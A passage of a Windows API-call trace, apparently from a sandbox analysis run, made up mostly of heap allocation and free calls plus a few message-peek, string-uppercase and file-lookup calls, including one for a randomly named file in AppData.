[0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0151.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0151.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0151.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0151.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0151.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0151.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0151.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0151.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0151.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0151.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0151.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0151.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0151.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0151.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0151.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0151.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0151.965] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0151.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0151.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0151.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0151.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0151.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0151.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0151.965] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0151.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0151.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0151.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0151.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0151.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0151.965] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0151.965] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.965] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0151.965] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0151.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0151.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0151.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0151.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0151.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0151.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.966] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0151.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0151.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0151.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0151.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0151.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0151.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0151.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0151.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0151.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0151.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0151.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0151.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0151.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0151.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.985] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0151.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0151.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0151.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0151.986] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0151.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0151.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0151.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0151.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0151.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.987] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0151.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0151.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0151.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0151.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0151.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.987] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/WvHidWJPV.m4a", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2812260, ftCreationTime.dwHighDateTime=0x1d5d6c2, ftLastAccessTime.dwLowDateTime=0xd82c4380, ftLastAccessTime.dwHighDateTime=0x1d5d26f, ftLastWriteTime.dwLowDateTime=0xd82c4380, ftLastWriteTime.dwHighDateTime=0x1d5d26f, nFileSizeHigh=0x0, nFileSizeLow=0x175f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="WvHidWJPV.m4a", cAlternateFileName="WVHIDW~1.M4A")) returned 0x9e1fb8 [0151.988] FindClose (in: hFindFile=0x9e1fb8 | out: hFindFile=0x9e1fb8) returned 1 [0151.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0151.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0151.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0151.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0151.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0151.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0151.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0151.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0151.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0151.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0151.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0151.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0151.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0151.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0151.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0151.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0151.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0151.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0151.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0151.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0151.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0151.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0151.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0151.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0151.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0151.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0151.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0151.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0151.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0151.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0151.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0151.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0151.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0151.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0151.989] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0151.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: 